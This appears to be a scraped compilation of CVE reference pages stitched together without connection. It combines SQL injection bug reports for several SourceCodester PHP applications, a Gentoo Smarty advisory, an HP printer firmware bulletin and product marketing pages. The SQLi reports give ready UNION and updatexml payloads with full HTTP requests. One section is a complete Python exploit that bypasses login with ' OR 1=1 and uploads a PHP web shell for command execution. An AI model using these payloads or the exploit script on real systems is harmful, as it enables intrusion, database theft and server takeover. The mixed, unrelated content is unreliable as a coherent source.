Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_currency.php.

Permalink

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Wybsignal

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_currency.php

Vulnerability location: /tour/admin/update\_currency.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_currency.php?id=-1%27%20union%20select%201,database(),3--+ // Leak place ---> id

GET /tour/admin/update\_currency.php?id\=\-1%27%20union%20select%201,database(),3\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40097: Bug_report/SQLi-1.md at main · WYB-signal/Bug_report

Sourcecodester Online Market Place Site 1.0 is vulnerable to Cross Site Scripting (XSS), allowing attackers to register as a Seller then create new products containing XSS payloads in the 'Product Title' and 'Short Description' fields.

Submitted by oretnom23 on Tuesday, April 12, 2022 - 17:21.

****Introduction****

This simple project is an **Online Market Place Site in PHP**. This is a web-based application project developed in **PHP** and **MySQL Database**. This project is an online platform that allows sellers to publish their selling items. This simple site was inspired by the Facebook Market Place feature where sellers can even sell used items. The application has a pleasant user interface using the **Bootstrap v5 Framework** and **Material Kit Template**. It also consists of user-friendly features and functionalities.

****About the Online Market Place Site in PHP****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Google Material Icon**
*   **Material Kit 2 Template**

This **Online Market Place Site in PHP** is composed of 3 User Interfaces which are the **Admin Panel**, **Seller Panel**, and **Public Site**. The **Admin Panel** is the side of the system where the system management can manage all the project data. **Admin Users** have the privilege to access and manage all the products or items that the seller published. They can also manage the list of users where they can update and delete sellers' data. The **Seller Panel** is the side of the system where the seller can manage their published items. The seller can add images and some information about the product that they are selling such as the item's specifications. They can set the quantity or stock that they have in each item they published. On the **Public Site**, site visitors or anonymous users can search for their desired product to check if someone posted a product that they wanted. Users can list all the available products and view each item's details. The posted product details also contain or display the seller's basic information and links where the possible buyer can contact them.

****Features********Admin-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Category Management**
    *   Add New Category
    *   List All Categories
    *   View Category Details
    *   Edit Category Details
    *   Delete Category Details
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Reset User Password
    *   Delete User Details
*   **Product Management**
    *   List All Products
    *   View Product Details
    *   Edit Product Details
    *   Delete Product Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Seller-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Product Management**
    *   Add New Product
    *   List All Products
    *   View Product Details
    *   Edit Product Details
    *   Delete Product Details
*   **Update Account and Contact Details/Credentials**
*   **Login and Logout**

****Public-Side****

*   **Home Page**
    *   Display the Welcome Content.
*   **'About Us' Content**
*   **List All Available Products**
*   **View Product Details**
*   **Redirect to Seller's Website**
*   **Redirect to Seller's FB Page**
*   **Get Seller's Contact Details**
*   **Search Product**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Public Site****

****Product List (Public-Side)****

****Product Details****

****Seller Registration Form****

****Seller Panel****

****Admin Panel****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)
*   **Download** the project assets at https://www.dropbox.com/s/uc5o9fr9ejpeg5d/php\_omps\_assets.zip?dl=1

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Extract** the **downloaded assets **zip** file**.
6.  **Copy** the extracted assets folder and **paste** it into the **source code** root path.
7.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
8.  **Create** a **new database** naming ****omps\_db****.
9.  **Import** the provided ****SQL**** file. The file is known as ****omps\_db.sql**** located inside the **database** folder.
10.  **Browse** the **Online Market Place Site in PHP** in a **browser**. i.e. ****http://localhost/omps/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****Sample Seller Access:****

Username: **mcooper**  
Password: **mcooper123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **Online Market Place Site in** **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   3428 views

CVE-2022-30003: Online Market Place Site in PHP/OOP Free Source Code

Online Diagnostic Lab Management System version 1.0 remote exploit that bypasses login with SQL injection and then uploads a shell.

    # Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)# Google Dork: N/A# Date: 2022-9-23# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# Authentication Required: bypass login with sql injection #/usr/bin/python3 import requests import osimport sysimport timeimport random# clean screenos.system("cls")os.system("clear")logo = '''###################################################################                                                                #  #    Exploit Script ( Online Diagnostic Lab Management System )  ##                                                                ###################################################################'''print(logo)url = str(input("Enter website url : "))username = ("' OR 1=1-- -")password = ("test")req = requests.Session()target = url+"/diagnostic/login.php"data = {'username':username,'password':password}website = req.post(target,data=data)files = open("rev.php","w")payload = "<?php system($_GET['cmd']);?>"files.write(payload)files.close()hash = random.getrandbits(128)name_file = str(hash)+".php"if "Login Successfully" in website.text:        print("[+] Login Successfully")    website_1 = url+"/diagnostic/php_action/createOrder.php"    upload_file = {         "orderDate": (None,""),        "clientName": (None,""),        "clientContact" : (None,""),        "productName[]" : (None,""),        "rateValue[]" : (None,""),        "quantity[]" : (None,""),        "totalValue[]" : (None,""),        "subTotalValue" : (None,""),        "totalAmountValue" : (None,""),        "discount" : (None,""),        "grandTotalValue" : (None,""),        "gstn" : (None,""),        "vatValue" : (None,""),        "paid" : (None,""),        "dueValue" : (None,""),        "paymentType" : (None,""),        "paymentStatus" : (None,""),        "paymentPlace" : (None,""),        "productImage" : (name_file,open("rev.php","rb"))        }     up = req.post(website_1,files=upload_file)    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")else:     print("[-] Check username or password")

Online Diagnostic Lab Management System 1.0 SQL Injection / Shell Upload

Gentoo Linux Security Advisory 202209-9 - Multiple vulnerabilities have been found in Smarty, the worst of which could result in remote code execution. Versions less than 4.2.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Smarty: Multiple vulnerabilities  
     Date: September 25, 2022  
     Bugs: #830980, #845180, #870100  
       ID: 202209-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Smarty, the worst of which  
could result in remote code execution

Background  
==========

Smarty is a template engine for PHP. The "template security" feature of  
Smarty is designed to help reduce the risk of a system compromise when  
you have untrusted parties editing templates.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-php/smarty             < 4.2.1                      >= 4.2.1

Description  
===========

Multiple vulnerabilities have been discovered in Smarty. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Smarty users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-php/smarty-4.2.1"

References  
==========

[ 1 ] CVE-2018-25047  
      https://nvd.nist.gov/vuln/detail/CVE-2018-25047  
[ 2 ] CVE-2021-21408  
      https://nvd.nist.gov/vuln/detail/CVE-2021-21408  
[ 3 ] CVE-2021-29454  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29454  
[ 4 ] CVE-2022-29221  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29221

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-09

Certain HP Print Products are potentially vulnerable to Buffer Overflow.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP Print Products are potentially vulnerable to Buffer Overflow and/or Remote Code Execution.

Severity

Critical

HP Reference

HPSBPI03810 rev. 1

Release date

September 21, 2022

Last updated

September 21, 2022

Category

Print

Potential Security Impact

Potential Buffer Overflow, Remote Code Execution

**Relevant Common Vulnerabilities and Exposures (CVE) List**

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2022-28721

9.8

Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-28722

7.1

High

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

PSR-2022-0021

**Resolution**

Update your printer firmware.

HP has provided firmware updates for potentially affected products listed in the table below. To obtain the updated firmware listed below, go to the HP Software and Driver Downloads, and then search for your printer model.

**Affected products**

Find the products affected and the firmware version that resolves the vulnerabilities.

**HP inkjet printers**

Review the table for affected HP inkjet printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP DeskJet Ink Advantage 5000 All-in-One Printer series

M2U86A, M2U86B, M2U86C, M2U87A, M2U87B, M2U88B, M2U89B

Affected

Not Affected

2211A or higher

HP DeskJet Ink Advantage 5200 All-in-One Printer series

M2U76A, M2U77A

Affected

Not Affected

2211C or higher

HP DeskJet Plus Ink Advantage 6000 All-in-One Printer series

5SE522A

Affected

Not Affected

001.2214A or higher

HP DeskJet Plus Ink Advantage 6400 All-in-One Printer series

5SD78A, 5SD79A

Affected

Not Affected

001.2214A or higher

HP ENVY 5000 All-in-One Printer series

M2U85B, Z4A59A, Z4A71A, M2U91B, Z4A69A, M2U92B, Z4A70A, M2U94B, Z4A73A, Z4A74A, M2U91A, M2U92A, M2U85A, M2U94A, Z4A54A, Z4A60A, Z4A61A, Z4A61B

Affected

Not Affected

2211C or higher

HP ENVY 6000 All-in-One Printer series

5SE17A, 6WD35A, 7CZ37A, 5SE18A, 5SE16A, 5SE19A, 5SE20A, 8QQ97A, 8QQ98A, 8QQ99A

Affected

Not Affected

001.2214B or higher

HP ENVY 6000e All-In-One Printer series

223N6A, 2K4V8A, 2K4W1A, 2K4W2A, 223N2A, 223N1A, 223N5A, 223N9A

Affected

Not Affected

001.2216A or higher

HP ENVY 6400e All-In-One Printer series

223R6A, 2K5L5A, 223R2A, 223R1A, 223R3A, 223R9A

Affected

Not Affected

001.2216A or higher

HP ENVY Photo 6200 All-in-One Printer series

K7G22A, K7G18A, K7G23A, Y0K15A, K7D05A

Affected

Not Affected

003.2220B or higher

HP ENVY Photo 7100 All-in-One Printer series

Z3M37A, K7G93A, Z3M52A, 3XD89A, K7G95A, K7G96A, K7G99A

Affected

Not Affected

003.2220B or higher

HP ENVY Photo 7800 All-in-One Printer series

K7R96A, K7S00A, K7S08A, K7S01A

Affected

Not Affected

003.2220B or higher

HP ENVY Pro 6400 All-in-One Printer series

5SE46A, 6WD14A, 6WD16A, 5SE47A, 5SE45A, 5SE48A, 7XK12A, 5SE50A, 8QQ86A, 8QQ87A, 8QQ88A

Affected

Not Affected

001.2214B or higher

HP OfficeJet 5200 All-in-One Printer series

M2U81A, Z4B29A, M2U81B, Z4B27A, M2U82B, Z4B28A, M2U84B, M2U82A, M2U75A, M2U84A, Z4B12A, Z4B13A, Z4B14A, Z4B18A

Affected

Not Affected

2211A or higher

HP OfficeJet 6950 All-in-One Printer series

P4C78A, P4C85A, T3P03A, P4C86A, P4C81A, P4C82A, P4C84A

Affected

Affected

001.2224A or higher

HP OfficeJet 6960 All-in-One Printer series

T0G25A, T0G26A

Affected

Affected

001.2225A or higher

HP OfficeJet 8010 All-in-One Printer series

1KR69A, 1KR58A

Affected

Not Affected

001.2213A or higher

HP OfficeJet 8010e All-in-One Printer series

228F5A

Affected

Not Affected

004.2222A or higher

HP OfficeJet 8022 All-in-One Printer

3UC65A

Affected

Not Affected

001.2213A or higher

HP OfficeJet 8022e All-in-One Printer

1K7K6A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 6960 All-in-One Printer series

J7K33A, T0F30A, T0F32A, T0F38A, T0F31A, J7K37A, J7K38A, J7K35A, J7K39A, T0F28A, T0F36A

Affected

Affected

001.2225A or higher

HP OfficeJet Pro 6970 All-in-One Printer series

J7K34A, T0F33A, T0F39A, T0F34A, T0F35A, J7K40A, J7K36A, J7K42A, J7K41A, T0F29A, T0F37A, T0F40A

Affected

Affected

001.2225A or higher

HP OfficeJet Pro 7720 Wide Format All-in-One Printer series

G5J56A, Y0S18A

Affected

Affected

003.2226A or higher

HP OfficeJet Pro 7730 Wide Format All-in-One Printer

L3T99A, Y0S19A

Affected

Affected

003.2226A or higher

HP OfficeJet Pro 7740 Wide Format All-in-One Printer series

G5J38A, T1P99A

Affected

Affected

002.2226A or higher

HP OfficeJet Pro 8020 All-in-One Printer series

1KR62A, 5LJ17A, 5LJ18A, 5LJ19A, 1KR57A, 1KR61A

Affected

Not Affected

001.2213A or higher

HP OfficeJet Pro 8020e All-in-One Printer series

1K7K7A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8030 All-in-One Printer series

1KR62A, 5LJ17A, 5LJ18A, 5LJ19A, 1KR57A, 1KR61A, 3UC64A

Affected

Not Affected

001.2213A or higher

HP OfficeJet Pro 8030e All-in-One Printer series

5LJ14A, 5LJ15A, 5LJ16A, 3UC66A, 4KJ65A, 5LJ23A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8035e All-in-One Printer

1L0H6A, 1L0H7A, 1L0H8A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8210 Printer series

D9L63A, D9L64A, J3P65A, J3P66A, J3P67A, J3P68A, T0G70A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 8710 All-in-One Printer series

D9L18A, M9L66A, M9L67A, T0G46A, J6X76A, J6X78A, J6X80A, K7S37A, M9L70A, J6X77A, J6X81A, J6X79A, K7S38A, T0G47A, T0G48A, T0G49A, M9L65A

Not Affected

Affected

001.2224B or higher

HP OfficeJet Pro 8730 All-in-One Printer

D9L20A, K7S32A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 8740 All-in-One Printer series

D9L21A, K7S42A, T0G65A, K7S39A, J6X83A, K7S43A, K7S40A, K7S41A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 9010 All-in-One Printer series

1KR46A, 3UK83A, 1KR49A, 1KR42A, 1KR45A, 3UK84A, 1KR48A, 1KR54A, 1KR55A

Affected

Not Affected

002.2211C or higher

HP OfficeJet Pro 9010e All-in-One Printer series

257G3A

Affected

Not Affected

005.2210A or higher

HP OfficeJet Pro 9020 All-in-One Printer series

1MR78A, 1MR66A, 1MR67A, 1MR69A, 1MR70A, 1MR71A, 1MR72A, 1MR73A, 1MR74A, 1MR75A, 1MR76A, 1MR77A, 1MR68A, 1MR79A

Affected

Not Affected

002.2211C or higher

HP OfficeJet Pro 9020e All-in-One Printer series

226Y9A, 1G5M0A

Affected

Not Affected

005.2210A or higher

HP Smart Tank 510 Wireless All-in-One series / HP Smart Tank Plus 550 Wireless All-in-One series

4SB23A, 3YW71A, 3YW74A, 1TJ09A, 3YW70A, 1TJ10A, 1TJ11A, 3YW73A, 6HF11A, 1TJ12A, 3YW72A, 3YW75A

Affected

Not Affected

001.2219A or higher

HP Smart Tank 610 Wireless All-in-One series / HP Smart Tank Plus 650 Wireless All-in-One series

Y0F71A, Y0F72A, Y0F73A, 7XV38A, Y0F74A, 3YW48A, 3YW51A

Affected

Not Affected

001.2219A or higher

HP Tango / HP Tango X

3DP64A, 3DP65A, 3DP66A, 3YF56A, 3YF57A, 3YF58A, 3YF60A, 3YF61A, 2RY54A, 2RY55A, 2RY56A, 3YF65A, 3YF66A, 3YF67A, 3YF68A, 3YF69A, 3YF70A, 3YF59A

Affected

Not Affected

2209A or higher

**HP LaserJet Pro printers**

Review the table for affected HP LaserJet Pro printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

Affected

Not Affected

002\_2208A or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

Affected

Not Affected

002\_2208A or higher

**HP PageWide Pro printers**

Review the table for affected HP PageWide Pro printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP PageWide 352dw Printer

J6U57A

Affected

Affected

2228B or higher

HP PageWide 377dw Multifunction Printer

J9V80A

Affected

Affected

2228B or higher

HP PageWide Managed P55250dw Printer series

J6U55A, J6U51B, J6U55B

Affected

Affected

2228B or higher

HP PageWide Managed P57750dw Multifunction Printer

J9V82A

Affected

Affected

2228B or higher

HP PageWide Managed P75050dn/dw

W1B28A, Y3Z45A W1B29A, Y3Z47A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740dn Multifunction Printer

Y3Z57A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740dw Multifunction Printer

W1B33A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740z Multifunction Printer

W1B39A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77750z Multifunction Printer

W1B37A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77760z Multifunction Printer

W1B38A

Affected

Affected

006.2225A or higher

HP PageWide Pro 452dn Printer series

D3Q15A

Affected

Affected

2228B or higher

HP PageWide Pro 452dw Printer series

D3Q16A

Affected

Affected

2228B or higher

HP PageWide Pro 477dn Multifunction Printer series

D3Q19A

Affected

Affected

2228B or higher

HP PageWide Pro 477dw Multifunction Printer series

D3Q20A

Affected

Affected

2228B or higher

HP PageWide Pro 552dw Printer series

D3Q17A

Affected

Affected

2228B or higher

HP PageWide Pro 577 Multifunction Printer series

D3Q21A, K9Z76A

Affected

Affected

2228B or higher

HP PageWide Pro 750dn Printer

Y3Z44A

Affected

Affected

006.2225A or higher

HP PageWide Pro 750dw Printer

A7W93A, Y3Z46A

Affected

Affected

006.2225A or higher

HP PageWide Pro 772dn Multifunction Printer

Y3Z54A

Affected

Affected

006.2225A or higher

HP PageWide Pro 772dw Multifunction Printer

W1B31A

Affected

Affected

006.2225A or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

September 21, 2022

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2022 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2022-28722: Certain HP Print Products - Potential Buffer Overflow, Remote Code Execution

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /wedding_details.php.

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: JunyuChen

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/wedding\_details.php?id=

Vulnerability location: /Wedding-Management-PHP/wedding\_details.php?id=, id

\[+\] Payload: /Wedding-Management-PHP/wedding\_details.php?id=-62%20union%20select%201,2,3,4,5,6,7,database(),9,10--+

dbname = dbwedding

GET /Wedding\-Management\-PHP/wedding\_details.php?id\=\-62%20union%20select%201,2,3,4,5,6,7,database(),9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

CVE-2022-40483: Bug_report/SQLi-1.md at main · Geoduck-CNN/Bug_report

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the booking parameter at /admin/client_edit.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: JunyuChen

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/client\_edit.php?booking=

Vulnerability location: /Wedding-Management-PHP/admin/client\_edit.php?booking=, booking

\[+\] Payload: /Wedding-Management-PHP/admin/client\_edit.php?booking=-33%20union%20select%201,2,3,4,5,database(),7,8--+&user\_id=33

dbname = dbwedding

GET /Wedding\-Management\-PHP/admin/client\_edit.php?booking\=\-33%20union%20select%201,2,3,4,5,database(),7,8\--+&user\_id=33 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

CVE-2022-40484: Bug_report/SQLi-2.md at main · Geoduck-CNN/Bug_report

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /package_detail.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: JunyuChen

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/package\_detail.php?id=

Vulnerability location: /Wedding-Management-PHP/package\_detail.php?id=, id

\[+\] Payload: /Wedding-Management-PHP/package\_detail.php?id=-5%20union%20select%201,database(),3,4--+

dbname = dbwedding

GET /Wedding\-Management\-PHP/package\_detail.php?id\=\-5%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

CVE-2022-40485: Bug_report/SQLi-3.md at main · Geoduck-CNN/Bug_report

Online Leave Management System v1.0 is vulnerable to SQL Injection via /leave_system/classes/Master.php?f=delete_application.

Permalink

Cannot retrieve contributors at this time

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Tmoont

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_application

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_application,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_application HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40928: Bug_report/SQLi-3.md at main · admin77888/Bug_report

The Scripts Organizer WordPress plugin before 3.0 does not have capability and CSRF checks in the saveScript AJAX action, available to both unauthenticated and authenticated users, and does not validate user input in any way, which could allow unauthenticated users to put arbitrary PHP code in a file

**Advanced Code editor for WordPress**

See Pricing

**Featured at:**

**Features List**

**Live Preview**

No need to have the website in a new tab and constantly reload the browser to see the changes. Press CTRL + S and reload changes on every save. Read more

**Add custom functionality to your WordPress by writing SCSS, CSS, JavaScript, PHP**

With Scripts Organizer you can write CSS, Java Script, HTML and PHP. The Header and the Footer blocks are HTML based and wrap scripts and styles in closing tags. In… Read more

**Safe mode**

No more fear for last-minute online edits. In case of something go wrong we got your back. After every save we are checking if the script is correct and in… Read more

**SCSS Partials**

Long CSS files can be long and important parts can not be reused. The solution to this is it split your CSS into parts and merge it with Scripts Organizer.… Read more

**Inject CSS and JS Location in Header or Footer**

By default when you create Code Block and you choose JS, CSS, or SCSS code will be generated as inline Script or Style. And that is great if you are… Read more

**Insert Oxygen's Global Colors**

Include Oxygen’s colors with only 1 click. No need to recreate or remember hex values anymore. Color will be included as Oxygen Builder native variable same as you would write… Read more

**Schedule Script Date**

Daily Easies way to explain this is that daily setting will be run every day without interruptions or any limit. Days This option will unlock the section below to choose… Read more

**Schedule Script Time**

All Day By the default “All Day” is selected and script will be running all day from 00:00 to 24:00. Time This option will unlock the section below to choose… Read more

**Scripts Manager**

With this powerful feature, you will be able to enqueue and register scripts and styles and trigger them the same way as any other code you are writing inside Scripts… Read more

**Exclude Conditions**

Have the option to select the entire website except: “Post types, Handpicked single posts, Taxonomies, or Terms.” Read more

**Code Editor**

With version 2.0 and above you will get Full Visual Studion code experience. We have integrated Monaco and with that, you will have a feeling like you never left the… Read more

**Export-Import**

Scripts Organizer We are using native WordPress post logic and with this, you can use WordPress post or pages “Export-Import” plugins. Having an extra plugin is a hassle so we… Read more

**Code Navigator**

